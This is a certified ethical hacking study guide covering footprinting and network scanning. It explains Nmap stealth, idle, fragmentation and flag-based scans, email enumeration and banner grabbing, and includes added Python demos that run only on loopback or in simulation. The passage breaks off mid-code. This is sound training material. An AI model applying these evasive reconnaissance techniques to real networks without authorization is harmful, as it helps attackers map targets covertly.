
C|EH 7.2 Supplemental Study Guide
Hacker-University

Dave Chronister, C|EH, CISSP, MCSE, C|HFI
Jason Roberts, C|EH, Security+, C|HFI
Ben Miller, C|EH, Security+

Module 2: Footprinting Study Guide

Objectives:
- What is Footprinting?
- Objectives of Footprinting
- Footprinting Threats
- Footprinting Methodology
- Internet Footprinting
- Competitive Intelligence
- WHOIS Footprinting
- People Searching
- DNS Footprinting
- Network Footprinting
- Email Footprinting
- Google Hacking
- Additional Footprinting Tools
- Footprinting Countermeasures
- Footprinting Pen Testing

What is Footprinting?

Footprinting is the term used for collecting information about a target. It is the first step in fully identifying a target in order to begin planning an attack. Footprinting means finding the digital and physical footprint that a target leaves simply by existing: registrations, publications, job postings, network allocations and so on.

The objective of Footprinting is to find as much information as possible about a target from as many sources as you can reach. In malicious hacking and in black-box ethical hacking, it is equally important to keep this information gathering from being noticed by the target.

Relevant target information includes:
- Domain names
- User and group names
- Network blocks
- System names
- IP addresses
- Employee details
- Networking protocols in use
- Company directory
- VPN entry points
- News articles and press releases
- Intrusion detection systems in use
- System banners

Footprinting Threats

The threat of Footprinting is that an attacker will learn sensitive information about a target from a publicly accessible source. From the target's perspective it is important to know what information is available to the general public, because that is exactly what the attacker starts from.

Footprinting Methodology

Footprinting begins with finding the target's main URL. Any search engine will usually disclose this website. From the main website you can begin searching for other hostnames under the same domain, such as intranet.*.com or mail.*.com.

Internet Footprinting

Our practice uses robtex.com and archive.org for finding information that has been, or is currently, loaded on websites. Archive.org's Wayback Machine keeps a database of when websites have changed their content, organized by date, so that you can view a website as it has progressed over the years; old contact pages, retired products and previously exposed paths are often still there. Robtex.com lists connections between websites that share a domain, name servers or IP space.

Competitive Intelligence

For business intelligence, any financial website will have information on publicly traded companies. Job hunting websites such as monster.com and dice.com allow searching by company, which can be used to find out what technical skills they are currently looking for. This allows an intelligent attacker to get an idea where a company may be weak, or whether it is looking to expand into a new technology.

WHOIS Footprinting

WHOIS data comes from two kinds of registries. Domain registrars and registries hold the registration record for a domain name (registrant, dates and name servers). The regional internet registries, such as ARIN for North America, keep a database of IP address allocations and who they are assigned to. The RIR data is what identifies a target's block of external IP addresses, and both kinds of record may provide information about technical points of contact, including the occasional phone number and email address.

People Searching

After an attacker has general information about a company they may require more specific information about people employed by or associated with the target. Using email addresses listed on internet sources, an attacker may begin profiling social media websites such as Facebook and LinkedIn, looking for more information. More specific information can be found on people-searching websites and on government websites for court cases, and Google Earth can be used to find location data.

DNS Footprinting

Using online tools such as www.checkdns.net, the publicly available DNS records for a site or IP address can be located. Some systems expose more information than others. This information may give an attacker a better understanding of a naming scheme and the organization of a target's computer systems.

Network Footprinting

Footprinting the edge network of a target begins with finding the IP range from WHOIS and then using a tool such as traceroute to determine the position of routers and possible DMZs. Traceroute discovers the hops in the route from one address to another by manipulating the Time To Live field of the IP header: it sends probes with TTL 1, 2, 3 and so on, and each router that decrements the TTL to zero answers with an ICMP Time Exceeded message, revealing its address. (Windows tracert sends ICMP echo requests as the probes; Unix traceroute sends UDP datagrams by default.)

It is at this point that Footprinting becomes Active. Reading information that someone else already published is a passive method. Sending probes such as traceroutes to a target and getting a response back is an active method. Any time you connect with the target it is active footprinting. If you call the automated attendant in the middle of the night to work out the phone tree, that is active too.

Email Footprinting

Email tracking can be used to monitor emails sent: when they are read and from what IP address. Email enumeration programs can generate likely address formats such as jsmith@hackertarget.com and test which names are actually in use. Using these techniques it is possible to map out an organization's email address structure. The same probing can reveal whether there are rules blocking executables or PDF documents, and what size restrictions apply. Remember, sending phishing or probe emails to the target's mail servers to work out the addressing scheme is active footprinting.

Google Hacking

Google hacking refers to using the advanced operators of search engines to find exploitable targets and to footprint known targets in a simple fashion. For example, using the intitle: operator you can search for web pages that have the word "password" in their title, which could give you valuable information about password policies or even a document listing passwords.

The Google Hacking Database at hackersforcharity.org has a list of common searches used by attackers, although this information is becoming outdated.

Google Advanced Operators:
- site:
- allintitle:
- intitle:
- inurl:

Additional Footprinting Tools

In addition to the tools previously mentioned, Maltego is another great footprinting tool. It provides a graphical representation of data. Using it makes it easier to visualize the connections found while footprinting a target, and to find relationships that may not have been apparent at first glance. However, it is important to know that Maltego maintains a cache of data that is not always the most up to date, so confirm anything important against the live source.

Footprinting Countermeasures

The most important countermeasure to Footprinting is knowing what information is available to outside requests. The information that is available may not be sensitive or worth keeping secret, but if an organization does not know what is available it cannot make that determination.

Proper configuration of network devices can protect from most technical Footprinting. WHOIS information should be registered to a role or position in the company, not to a specific person. Policies should be enacted for the release of information through any channel: web, email, phone communications, and any other method. Once information is released it will be cataloged and kept in some form somewhere, and it cannot be recalled.

Be familiar with these standard ports:

  20   FTP data
  21   FTP control
  22   SSH
  23   Telnet
  25   SMTP
  53   DNS (TCP and UDP!)
  69   TFTP (UDP)
  80   HTTP
  88   Kerberos
  110  POP3
  135  Microsoft RPC endpoint mapper
  137  NetBIOS name service (UDP)
  138  NetBIOS datagram service (UDP)
  139  NetBIOS session service (SMB over NetBIOS)
  161  SNMP (UDP)
  389  LDAP
  443  HTTPS
  445  SMB (direct hosting, without NetBIOS)
  636  LDAP over SSL or TLS

Note: The CEH exam expects you to have knowledge of standard ports.

Footprinting Pen Testing

First and foremost, get proper written authorization before beginning any Footprinting. For the most part, passive information gathering is legal. However, legal does not always mean ethical as well. After you have written authorization, find out as much as you can about your target using passive techniques, documenting everything you find along the way. Once you have exhausted passive sources, use active sources as anonymously as possible to keep yourself from being noticed. Documentation at this stage will make every other hacking activity easier.

Module 3: Scanning Networks Study Guide

Objectives:
- Definition and Types of Scanning
- Understanding CEH Scanning Methodology
- Checking Live Systems and Open Ports
- Understanding Scanning Techniques
- Different Tools Present to Perform Scanning
- Understanding Banner Grabbing and OS Fingerprinting
- Drawing Network Diagrams and Vulnerable Hosts
- Preparing Proxies
- Understanding Anonymizers
- Scanning Countermeasures
- Scanning Pen Testing

Definitions and Types of Scanning

Network scanning is a procedure for identifying active hosts on a network, either for the purpose of attacking them or for network security assessment. Scanning procedures such as ping sweeps and port scans return information about which IP addresses map to live hosts and what services those hosts offer.

Network Scan - Identifies active hosts on a network.
Port Scan - Sends client requests to a range of server port addresses on a host with the goal of finding active ports, as a prelude to exploiting a known vulnerability of the service behind one of them.
Vulnerability Scan - Designed to assess computers, computer systems, networks or applications for weaknesses.

Understanding CEH Scanning Methodology

1. Check for Live Systems
2. Check for Open Ports
3. Banner Grabbing
4. Scan for Vulnerability
5. Draw Network Diagrams
6. Prepare Proxies

Checking Live Systems and Open Ports

ICMP Scanning - During most ping scans using ICMP, an ICMP Echo Request is sent to the remote computer to determine whether its IP address is active. If all is well, the computer that sent the Echo Request receives an ICMP Echo Reply, which means that the host is up. If no response is received, it usually means that the host is down, or that an administrator is filtering either the request or the reply; the absence of a reply is not proof that the host is down. The simplest tool for this is the ping command, which comes with *nix and Windows systems alike.

Ping Sweeps - Used to determine live hosts from a range of IP addresses by sending ICMP Echo Requests to multiple hosts; those that are alive respond with an ICMP Echo Reply. A sweep can be used to create an inventory of live systems on a network.

TCP Three-Way Handshake - To establish a connection, TCP uses a three-way handshake. Before a client attempts to connect with a server, the server must first bind to a port to open it up for connections: this is called a passive open. Once the passive open is established, a client may initiate an active open. To establish the connection, the three-way (or three-step) handshake occurs:

1. SYN: The active open is performed by the client sending a SYN to the server. It sets the segment's sequence number to a random value A.
2. SYN-ACK: In response, the server replies with a SYN-ACK. The acknowledgment number is set to one more than the received sequence number (A + 1), and the sequence number that the server chooses for the packet is another random number, B.
3. ACK: Finally, the client sends an ACK back to the server. The sequence number is set to the received acknowledgement value, A + 1, and the acknowledgement number is set to one more than the received sequence number, B + 1.

At this point, both the client and server have received an acknowledgment of the connection.

If that didn't sink in, here's another way of thinking about it. The three-way handshake is a lot like a phone call. You dial the number (the initial connection, SYN), the recipient picks up the phone ("hello", SYN/ACK), and you respond "Hi there, this is Bill" (ACK). From there you two talk (lots of ACKs). At the end of the conversation one of you says "well, I gotta go" (FIN), the other person says "ok, see you, bye" (FIN/ACK), you say "Bye" (ACK), and the conversation closes with both of you putting the phone down. In between there are a bunch of ACK/PSH and ACK segments as you two chat. Each part of the conversation is broken down into sentences, if you will; as the two of you transfer data, those sentences are passed back and forth with the ACK/PSH and ACK flags set.

Hping2 / Hping3

Hping is a free packet generator and analyzer for the TCP/IP protocol suite. Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and it was used to develop the Idle Scan technique now implemented in the Nmap port scanner. The newer version, hping3, is scriptable using the Tcl language and implements an engine for string-based, human-readable descriptions of TCP/IP packets, so that the programmer can write scripts for low-level TCP/IP packet manipulation and analysis in a very short time. Like most tools used in computer security, hping is useful to security experts, but it also has many applications in network testing and system administration.

Understanding Scanning Techniques

(-s*) = scan-type switches used in Nmap. Zenmap is the front-end GUI for Nmap; it shows the command line it builds, which is very helpful for learning the switches.

TCP Connect / Full Open Scan (-sT)

The TCP connect scan is named after the connect() call that the operating system uses to initiate a TCP connection to a remote device. Unlike the TCP SYN scan (-sS), the TCP connect scan uses a normal TCP connection to determine if a port is available. This scan method uses the same TCP handshake that every other TCP-based application on the network uses: an open port completes the three-way handshake, a closed port answers the SYN with an RST, and a port that returns nothing is reported as filtered.

This scan is very noisy on a network and highly detectable through application event logs, because the connection is fully established and then torn down; the listening service sees an accepted connection that carries no data. It might be considered the TCP scan of last resort. If privileged access isn't available and determination of open TCP ports is absolutely necessary, however, this scan may be the only method available.

Stealth Scan (Half-Open Scan) (-sS)

The TCP SYN scan gathers information about open ports without completing the TCP handshake. Nmap sends a SYN; a SYN/ACK reply means the port is open, an RST means it is closed, and no reply (or an ICMP unreachable error) means it is filtered. When an open port is identified, Nmap answers the SYN/ACK with an RST, so the handshake is torn down before it can be completed. This technique is often referred to as "half open" scanning.

The SYN scan is the most common scan when looking for open ports on a remote device, and its simple SYN methodology works against all operating systems. Because it only half-opens the TCP connection, it's considered a very clean scan type. The TCP SYN scan never creates a TCP session, so it isn't logged by the destination host's applications. This is a much "quieter" scan than the TCP connect scan with respect to application logs, although a firewall or IDS watching at the packet level sees the SYNs just the same.
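The following is an added example, not code from the study guide, showing what a connect scan actually does and why it is so visible. It runs entirely against 127.0.0.1: it opens a listening socket to play the open port, picks a free port to play the closed port, classifies each with the OS connect() call, and then shows that the listener is handed a fully established, empty connection, which is the entry an application log would record. The listener, the port numbers and the log wording are all constructed for the demo.

```python
import socket


def free_loopback_port():
    """Return a port that is currently closed on 127.0.0.1: bind to 0, read the number back, close."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def connect_scan(host, port, timeout=1.0):
    """Full-open scan of one TCP port using the OS connect() call, the same thing nmap -sT does.

    open     -> the three-way handshake completed (SYN, SYN/ACK, ACK)
    closed   -> the target answered the SYN with RST (surfaces as ECONNREFUSED)
    filtered -> nothing came back before the timeout (a filter dropped the SYN)
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except socket.timeout:
        return "filtered"
    finally:
        s.close()   # tear-down; by now the target has already queued the connection for its application


def scan_demo():
    """Scan one open and one closed loopback port, then look at what the listening service sees."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    open_port = srv.getsockname()[1]
    closed_port = free_loopback_port()

    results = {
        "open": connect_scan("127.0.0.1", open_port),
        "closed": connect_scan("127.0.0.1", closed_port),
    }

    # The scanner never sent a byte, yet the handshake completed in the kernel, so the
    # service still gets the connection handed to it. This is what makes -sT show up in logs.
    app_log = []
    srv.setblocking(False)
    while True:
        try:
            conn, peer = srv.accept()
        except BlockingIOError:
            break
        app_log.append("accepted connection from %s:%d, peer closed without sending data" % peer)
        conn.close()
    srv.close()

    results["log_entries"] = len(app_log)
    results["log"] = app_log
    return results


if __name__ == "__main__":
    for key, value in scan_demo().items():
        print(key, value)
```

The "filtered" branch cannot be exercised on loopback (nothing drops packets there); against a real firewall it is the timeout path that fires, which is also why connect scans of filtered ranges are slow.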

The SYN scan requires privileged access to the system. Without privileged access Nmap cannot create the raw packets necessary for this half-open scan.

The SYN scan only provides open, closed, or filtered port information. To determine operating system or service version information, more intrusive scanning is required, such as the version scan (-sV) or the operating system fingerprinting (-O) option.

Xmas Scan (-sX), FIN Scan (-sF), and NULL Scan (-sN)

These three scans are grouped together because they work the same way. They are called "stealth" scans because they send a single frame to a TCP port without any TCP handshaking or additional packet transfers; each probe expects at most a single response. The only difference between them is which TCP flags are set:

- Xmas: FIN, URG and PSH flags set
- FIN: FIN flag only
- NULL: no flags set

The Xmas Scan (-sX) sends a TCP segment to a remote device with the FIN, URG and PSH flags set. It is called a Christmas tree scan because of the alternating bits turned on and off in the flags byte (00101001), much like the lights of a Christmas tree.

The FIN Scan (-sF) identifies listening TCP ports based on how the target reacts to a close request (FIN) for a port on which no connection exists. This type of scan can get through basic firewalls and boundary routers that filter on incoming TCP packets with the Finish (FIN) and Acknowledgement (ACK) flag combination, because the packets used in this scan carry only the FIN flag.

The Null Scan (-sN) is a type of TCP scan that both ethical and malicious hackers use to identify listening TCP ports. In the right hands, a Null Scan can help identify holes for server hardening; in the wrong hands it is a reconnaissance tool, a pre-attack probe.

A Null Scan is a series of TCP segments with no flags set. In normal traffic there is never a TCP segment that doesn't carry at least one flag. Because the Null Scan probes carry no flags, they can sometimes penetrate firewalls and edge routers that filter incoming packets on particular flags.

The expected result of a Null Scan against an open port is no response: RFC 793 tells a listening port to discard a segment that carries neither SYN, RST nor ACK, so the target silently drops it. If the port is closed, the target sends an RST in response. Because "no response" is also what a filtering device produces, Nmap reports a silent port from any of the FIN, NULL and Xmas scans as open|filtered rather than open.

The Idle Scan

The IDLE scan (-sI) is the ultimate stealth scan, but it can be more time consuming. You also need to locate a zombie workstation or network device that is idle, hence the name. If the zombie is not idle and has other network traffic, its IP ID sequence will be bumped by that traffic and the scan logic is disrupted.

The lower the latency between the attacker and the zombie, and between the zombie and the target, the faster the scan will proceed. Simple network devices such as printers often make great zombies because they are commonly both underused (idle) and built with simple network stacks that use a single, globally incrementing IP ID counter.

The scan works by watching the zombie's IP ID counter. The attacker first probes the zombie (for example with a SYN/ACK, which draws an RST) to read its current IP ID, then sends the target a SYN with the source address spoofed to be the zombie, then probes the zombie again.

Open Port: If the target's port is open, it sends a SYN/ACK to the zombie. The zombie responds to the unexpected SYN/ACK with an RST, bumping its IP ID by 1. Together with the attacker's own probe, the IP ID has advanced by 2.

Closed Port: If the port is closed, the target responds to the spoofed SYN with an RST. The zombie does not respond to an RST, so the target's reply does not increment its IP ID; only the attacker's probe advances it, and the IP ID has advanced by 1. A filtered port produces the same result, so idle scan reports closed|filtered.

ICMP Echo Scanning / List Scan

The ping scan (-sP; renamed -sn in newer Nmap versions) is the most simplistic discovery method and the easiest to detect. By sending a series of ICMP echo request (ICMP type 8) packets to various IP addresses, an attacker can determine which systems are active (or "alive"). Knowing that Intrusion Detection Systems (IDSs) are designed to catch this kind of discovery sequence, attackers vary the destination devices or delay the ping interval by minutes, hours, or even days.
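An added simulation (not code from the study guide, and sending no packets) of the IP ID arithmetic the idle scan relies on. The zombie, target, addresses and port numbers are all made up for the demo; the zombie models an RFC 793 host with one global IP ID counter, the target answers a SYN with SYN/ACK, RST or silence, and the attacker only ever talks to the zombie. It also shows what a non-idle zombie does to the result.

```python
# Packets are plain dicts: src, dst, flags, and (where relevant) sport, dport, ip_id.

class Zombie:
    """An idle host whose stack uses a single, globally incrementing IP ID (a printer, say)."""

    def __init__(self, ip, ip_id=1000):
        self.ip = ip
        self.ip_id = ip_id

    def _emit(self, dst, flags):
        self.ip_id += 1                       # every packet the zombie sends bumps the counter
        return {"src": self.ip, "dst": dst, "flags": flags, "ip_id": self.ip_id}

    def receive(self, pkt):
        # RFC 793 behaviour for a host with no matching connection:
        # an unsolicited SYN/ACK is answered with RST; an RST is silently discarded.
        if pkt["flags"] == "SYN/ACK":
            return self._emit(pkt["src"], "RST")
        return None

    def background_traffic(self, packets):
        """A zombie that is not idle: unrelated traffic advances the counter between our probes."""
        self.ip_id += packets


class Target:
    """The scanned host: SYN to an open port draws SYN/ACK, to a closed port RST, to a filtered port nothing."""

    def __init__(self, ip, open_ports, filtered_ports=()):
        self.ip = ip
        self.open_ports = set(open_ports)
        self.filtered_ports = set(filtered_ports)

    def receive(self, pkt):
        if pkt["flags"] != "SYN" or pkt["dport"] in self.filtered_ports:
            return None
        flags = "SYN/ACK" if pkt["dport"] in self.open_ports else "RST"
        return {"src": self.ip, "dst": pkt["src"], "flags": flags,
                "sport": pkt["dport"], "dport": pkt["sport"]}


def probe_zombie_ipid(attacker_ip, zombie):
    """Steps 1 and 3: send the zombie a SYN/ACK and read the IP ID off the RST it returns."""
    rst = zombie.receive({"src": attacker_ip, "dst": zombie.ip, "flags": "SYN/ACK"})
    return rst["ip_id"]


def idle_scan_port(attacker_ip, zombie, target, port, noise=0):
    """Scan one target port through the zombie. `noise` = unrelated packets the zombie sends meanwhile."""
    before = probe_zombie_ipid(attacker_ip, zombie)

    # Step 2: SYN to the target with the zombie's address as source. The attacker never
    # sees the reply; whatever the target sends goes to the zombie.
    spoofed = {"src": zombie.ip, "dst": target.ip, "flags": "SYN", "sport": 40000, "dport": port}
    reply = target.receive(spoofed)
    if reply is not None:
        zombie.receive(reply)                 # SYN/ACK -> zombie emits RST (+1); RST -> dropped (+0)
    zombie.background_traffic(noise)

    after = probe_zombie_ipid(attacker_ip, zombie)
    delta = after - before                    # the attacker's own second probe always adds 1
    if delta == 2:
        return "open"
    if delta == 1:
        return "closed|filtered"
    return "unreliable (zombie not idle, IP ID advanced by %d)" % delta


def demo():
    zombie = Zombie("10.0.0.9")
    target = Target("10.0.0.50", open_ports={22, 80}, filtered_ports={23})
    return {
        22: idle_scan_port("10.0.0.1", zombie, target, 22),
        25: idle_scan_port("10.0.0.1", zombie, target, 25),
        23: idle_scan_port("10.0.0.1", zombie, target, 23),
        80: idle_scan_port("10.0.0.1", zombie, target, 80, noise=3),
    }


if __name__ == "__main__":
    for port, verdict in demo().items():
        print(port, verdict)
```

Port 80 is open, but with three stray packets from the zombie in between the probes the delta is neither 1 nor 2, which is why Nmap tests a candidate zombie's IP ID behaviour first and retries probes whose delta makes no sense.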

-sL (List Scan)

The list scan is a degenerate form of host discovery that simply lists each host of the network(s) specified, without sending any packets to the target hosts. By default, Nmap still does reverse-DNS resolution on the hosts to learn their names. It is often surprising how much useful information simple hostnames give out. For example, fw.chi is the name of one company's Chicago firewall. Nmap also reports the total number of IP addresses at the end. The list scan is a good sanity check to ensure that you have proper IP addresses for your targets. If the hosts sport domain names you do not recognize, it is worth investigating further to prevent scanning the wrong company's network. (Note that the reverse-DNS lookups do go to a DNS server, so a list scan is not completely silent.)

SYN/FIN Scanning Using IP Fragments (-f)

Fragmentation scanning is not a new scanning method in and of itself, but a modification of other techniques. Instead of just sending the probe packet, you break it into a couple of small IP fragments, splitting the TCP header over several packets to make it harder for packet filters and the like to see what you are doing. Be careful with this! Some programs have trouble handling these tiny packets. The -f option instructs the specified SYN or FIN scan to use tiny fragmented packets.

UDP Scanning (-sU)

This scanning method differs from the above in that we are using the UDP protocol instead of TCP. While this protocol is simpler, scanning it is actually significantly more difficult. This is because open ports don't have to send an acknowledgement in response to our probe, and closed ports aren't even required to send an error packet. Fortunately, most hosts do send an ICMP Port Unreachable error (type 3, code 3) when you send a packet to a closed UDP port. Thus you can find out if a port is NOT open, and by exclusion determine which ports may be. Neither UDP packets nor the ICMP errors are guaranteed to arrive, so UDP scanners of this sort must also implement retransmission of packets that appear to be lost (or you will get a bunch of false positives). Many hosts also rate-limit ICMP errors, which is the main reason UDP scans are slow.

You will also need to be root for access to the raw ICMP socket necessary for reading the port unreachable messages. The -sU option of Nmap implements this scanning method for root users. A port that answers with data is reported open, a port that draws a port-unreachable error is closed, and a port that stays silent is reported open|filtered.

Some think UDP scanning is pointless, however you may come across holes where services are running on undocumented higher UDP ports. While some lower ports may be blocked you may be successful with scanning higher ports.
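An added example (not from the study guide) of the three UDP outcomes above, run against loopback so it works offline. It assumes a Linux host, where the kernel hands the ICMP port-unreachable for a connected UDP socket back to the application as ECONNREFUSED, so no raw ICMP socket or root is needed. The three local sockets (a service that answers, a service that is open but silent, and nothing at all) are constructed for the demo.

```python
import socket
import threading


def udp_probe(host, port, payload=b"\x00", timeout=0.3, retries=2):
    """Probe one UDP port the way a UDP scanner does.

    open          -> the service answered with data
    closed        -> an ICMP port unreachable came back (surfaced as ECONNREFUSED)
    open|filtered -> silence even after `retries` retransmissions: open but mute, or dropped by a filter
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        # connect() on a UDP socket sends nothing; it tells the kernel to deliver ICMP
        # errors for this destination to this socket instead of discarding them.
        s.connect((host, port))
        for _ in range(retries + 1):
            try:
                s.send(payload)
                s.recv(1024)
                return "open"
            except ConnectionRefusedError:
                return "closed"
            except socket.timeout:
                continue              # could simply be lost: retransmit before concluding
        return "open|filtered"
    finally:
        s.close()


def _bind_udp():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind(("127.0.0.1", 0))
    return s


def free_udp_port():
    s = _bind_udp()
    port = s.getsockname()[1]
    s.close()
    return port


def scan_demo():
    talker = _bind_udp()          # a service that answers any datagram (think DNS given a valid query)
    mute = _bind_udp()            # a service that is open but says nothing to our payload (the usual case)
    closed_port = free_udp_port() # nothing listening

    def answer_once():
        talker.settimeout(2.0)
        try:
            data, peer = talker.recvfrom(1024)
            talker.sendto(b"reply:" + data, peer)
        except socket.timeout:
            pass

    t = threading.Thread(target=answer_once)
    t.start()
    try:
        results = {
            "talker": udp_probe("127.0.0.1", talker.getsockname()[1]),
            "mute": udp_probe("127.0.0.1", mute.getsockname()[1]),
            "closed": udp_probe("127.0.0.1", closed_port),
        }
    finally:
        t.join()
        talker.close()
        mute.close()
    return results


if __name__ == "__main__":
    print(scan_demo())
```

The mute port takes (retries + 1) timeouts to classify, and a real host rate-limits the ICMP errors for the closed ones; multiply that by 65535 ports and you have the reason a full -sU run takes hours.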

Inverse TCP Flag Scanning

Filtering and other security systems such as firewalls and IDS can detect SYN packets, and there are programs available that can detect half-open SYN scan attempts as well. Probe packets with strange TCP flags set can sometimes pass through undetected, depending on the security mechanisms in place.

Using unusual TCP flag combinations to probe a target is known as an inverse technique because responses are sent back only by closed ports. RFC 793 states that if a port is closed on a host, an RST (RST/ACK when the probe carried no ACK) should be sent to reset the connection. To take advantage of this behaviour, attackers send TCP probe packets with various TCP flags set to each port of the target host. Three probe configurations are normally used:

- A FIN probe with only the FIN flag set
- An Xmas probe with the FIN, URG and PSH flags set
- A NULL probe with no TCP flags set

RFC 793 also means that if no response is seen from the target port, either the port is open, the probe was filtered, or the host is down. This scanning method isn't necessarily the most accurate, but it is stealthy; it sends each port a single odd segment that usually won't be picked up.

For all closed ports on the target host, RST/ACK packets are received. However, some operating platforms (such as those in the Microsoft Windows family) disregard this part of RFC 793 and send an RST for these probes whether the port is open or closed, so every port appears closed and nothing is learned. Hence this technique is effective against Unix-derived platforms but not against Windows.

ACK Flag Scanning (-sA)

A related technique sends ACK probe packets and analyzes the RST packets that come back. Per RFC 793, an ACK that belongs to no connection draws an RST from both open and closed ports, so a plain ACK scan cannot tell open from closed; what it tells you is whether the port is reachable at all. An RST means the port is unfiltered (the probe got through and the host answered), while no response, or an ICMP unreachable error, means a filtering device is in the way. That makes the ACK scan the tool for mapping firewall rule sets and telling stateful from stateless filters: a stateless filter that only blocks SYN passes the ACK, a stateful one drops it because it belongs to no connection it has seen.

Two refinements try to squeeze open/closed information out of the returned RSTs by exploiting quirks of BSD-derived TCP/IP stacks, and are therefore only effective against certain operating systems:

- Analysis of the time-to-live (TTL) field of received packets
- Analysis of the WINDOW field of received packets (Nmap's window scan, -sW)

These techniques can also be used to understand the path packets take through a complicated target network. For example, the TTL value can be used as a marker of how many systems the packet has hopped through.
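The following is an added model (not code from the study guide) that puts the FIN/NULL/Xmas, SYN and ACK sections side by side: how an RFC 793 host answers each single-segment probe to an open or closed port, how a Windows-style host answers, and what the scanner concludes. The Windows behaviour is the one the text describes (RST to everything except a SYN to an open port); the "stateless SYN-dropping filter" is an assumed packet-filter rule used to show why inverse scans and the ACK scan see through it.

```python
# Flags are sets of strings. A None response means the probe was dropped, either by the
# stack (FIN/NULL/XMAS at a listening port) or by a filter in front of the host.

OPEN, CLOSED = "open", "closed"

PROBES = {
    "SYN":  {"SYN"},
    "ACK":  {"ACK"},
    "FIN":  {"FIN"},
    "NULL": set(),
    "XMAS": {"FIN", "URG", "PSH"},
}


def rfc793_stack(port_state, probe):
    """RFC 793 section 3.9: a segment arriving for a port in CLOSED or LISTEN state."""
    if "RST" in probe:
        return None                                 # an RST is never answered
    if port_state == CLOSED:
        return {"RST"} if "ACK" in probe else {"RST", "ACK"}
    # LISTEN: an ACK that belongs to no connection is reset; a SYN is accepted;
    # anything else (FIN, NULL, XMAS) is dropped without a reply.
    if "ACK" in probe:
        return {"RST"}
    if "SYN" in probe:
        return {"SYN", "ACK"}
    return None


def windows_stack(port_state, probe):
    """Windows family: only a SYN to an open port gets SYN/ACK; every other probe draws RST."""
    if "RST" in probe:
        return None
    if port_state == OPEN and "SYN" in probe and "ACK" not in probe:
        return {"SYN", "ACK"}
    return {"RST"} if "ACK" in probe else {"RST", "ACK"}


def stateless_syn_filter(probe):
    """Assumed packet-filter rule 'drop inbound new connections' that looks at flags only. True = dropped."""
    return "SYN" in probe and "ACK" not in probe


def infer(scan, response):
    """What the scanner concludes from the response to one probe of the given scan type."""
    if scan == "SYN":
        if response and "SYN" in response:
            return "open"
        return "closed" if response else "filtered"
    if scan == "ACK":
        # RST from open and closed alike: the ACK scan only tells us the port is reachable.
        return "unfiltered" if response else "filtered"
    # Inverse scans (FIN/NULL/XMAS): only a closed port talks back.
    return "closed" if response else "open|filtered"


def scan_matrix(stack, firewall=None):
    """Run every scan type against an open and a closed port, optionally behind a filter."""
    matrix = {}
    for scan, flags in PROBES.items():
        for state in (OPEN, CLOSED):
            if firewall is not None and firewall(flags):
                response = None                     # the probe never reached the host
            else:
                response = stack(state, flags)
            matrix[(scan, state)] = infer(scan, response)
    return matrix


if __name__ == "__main__":
    cases = (("RFC 793 host", rfc793_stack, None),
             ("Windows host", windows_stack, None),
             ("RFC 793 host behind a SYN-dropping stateless filter", rfc793_stack, stateless_syn_filter))
    for label, stack, fw in cases:
        print(label)
        for (scan, state), verdict in scan_matrix(stack, fw).items():
            print("  %-4s probe, port really %-6s -> %s" % (scan, state, verdict))
```

Reading the three tables: on the RFC 793 host the inverse scans separate closed from open|filtered; on the Windows host every port looks closed to them, which is the failure the text warns about; behind the stateless filter the SYN scan sees only "filtered" while FIN probes still sort the ports and the ACK scan reports "unfiltered", which is exactly how -sA exposes a filter that is not tracking state.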

Different Tools Present to Perform Scanning

IP fragmentation tools: fragtest and fragroute, for fragmenting probe packets.

Nmap: free, open source utility for network exploration and mapping. Nmap will extract information such as:
- Live hosts on a network
- Services (application names and versions)
- Operating systems (OS versions)
- Type of packet filters / firewalls in the way

SuperScan: a powerful TCP port scanner that includes a variety of additional networking tools like ping, traceroute, HTTP HEAD, WHOIS and more. It uses multi-threaded and asynchronous techniques, resulting in extremely fast and versatile scanning.

Understanding Banner Grabbing and OS Fingerprinting

OS Fingerprinting determines what operating system is running on a remote target system. There are two types of OS fingerprinting: active and passive.

Active OS fingerprinting sends specially crafted packets to the remote host and compares the responses with a database to determine the OS. Responses from different operating systems vary due to differences in TCP/IP stack implementation (initial TTL, window size, option ordering, and how malformed probes are answered).

Passive OS fingerprinting uses sniffing techniques to capture packets flowing from the system, without sending anything to it. Captured packets are then analyzed for OS information. It is also based on variations in how the TCP/IP stack is implemented.

Banner Grabbing

Banner grabbing is an enumeration technique used to glean information about computer systems on a network and the services running on their open ports. Administrators can use it to take inventory of the systems and services on their network. An intruder, however, can use banner grabbing to find network hosts that are running versions of applications and operating systems with known exploits.

A telnet client can be used for banner grabbing:

  telnet [target ip or hostname] [port]
  telnet www.victim.com 80

Then use the GET or HEAD command in your telnet session; the HEAD command will suffice for fingerprinting, for example:

  HEAD / HTTP/1.0

followed by a blank line (press Enter twice). The Server: header in the reply is the banner.

Banner grabbing from error pages

Typing in a URL that does not exist on a server can result in an error page listing server information, such as the web server product and version, and sometimes the operating system or scripting modules.
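An added example (not from the study guide) that does the telnet/HEAD exchange above over a raw socket and pulls the Server: header out of both a normal reply and a 404 error reply. Because there is no real target, the block starts its own HTTP listener on 127.0.0.1 whose "Apache/2.2.15" banner is made up for the demo; the request bytes are exactly what you would type into telnet.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class FakeApache(BaseHTTPRequestHandler):
    """Stand-in target. The banner is constructed for the demo, not observed on any real host."""
    server_version = "Apache/2.2.15 (Unix) mod_ssl/2.2.15"
    sys_version = ""          # suppress the Python version the default handler would append

    def do_HEAD(self):
        if self.path == "/":
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
        else:
            self.send_error(404)   # the error response carries the same Server: header

    def do_GET(self):
        self.do_HEAD()

    def log_message(self, *args):  # keep the demo quiet
        pass


def grab_banner(host, port, path="/", timeout=2.0):
    """Raw-socket equivalent of 'telnet host port', then 'HEAD / HTTP/1.0' and a blank line."""
    request = "HEAD %s HTTP/1.0\r\nHost: %s\r\n\r\n" % (path, host)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request.encode("ascii"))
        chunks = []
        while True:
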